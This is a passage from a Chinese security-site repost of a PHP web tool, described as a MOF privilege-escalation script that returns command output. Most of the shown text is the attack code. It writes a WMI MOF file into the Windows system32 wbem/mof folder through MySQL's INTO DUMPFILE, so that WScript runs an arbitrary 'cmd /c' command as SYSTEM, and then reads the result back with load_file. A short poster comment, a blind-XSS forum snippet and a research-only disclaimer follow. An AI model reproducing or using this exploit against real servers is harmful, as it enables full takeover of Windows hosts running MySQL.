location.href='?action=connect'"; } if(empty($_GET["action"])){ ?>Win MOF Shell
'.mysql_error().''); echo "
"; echo ""; if (isset($_POST['cmd'])){ $strCmd=$_POST['cmd']; $cmdshell='cmd /c '.$strCmd.'>'.$path; $mofname="c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"$cmdshell\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };"; mysql_select_db($_COOKIE["connect"]["dbname"],$conn); $sql1="select '$payload' into dumpfile '$mofname';"; if(mysql_query($sql1)) echo "Execute Successful!
Please click the read button to check the result!!
If the result is not correct,try read again later
"; else die(mysql_error()); mysql_close($conn); } if(isset($_POST['flag'])) { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('
'.mysql_error().'
');
$sql2="select load_file("".$path."");";
$result2=mysql_query($sql2);
$num=mysql_num_rows($result2);
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "
";
echo '
'. $row[0].'
';
}
mysql_close($conn);
}
}
?>
早就写好了,发给群里几个小兄弟,不知道怎么就到helen大黑客手里了,大黑客helen还原封保留哥哥的内网ip啊 感谢龙哥帮助哈。
文章来源于lcx.cc:mof提权带回显带清楚命令版本.php
请问什么叫xss盲打? khjian | 2013-11-02 13:27 xss小白,老听人讲xss盲打,是什么意思啊?大牛给科普一下呗,谢谢了 [原文地址] 相关内容: 1# 小胖子 (我承认,我爱过VIP,我仅仅是爱过,因为他死了。) | 2013-11…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论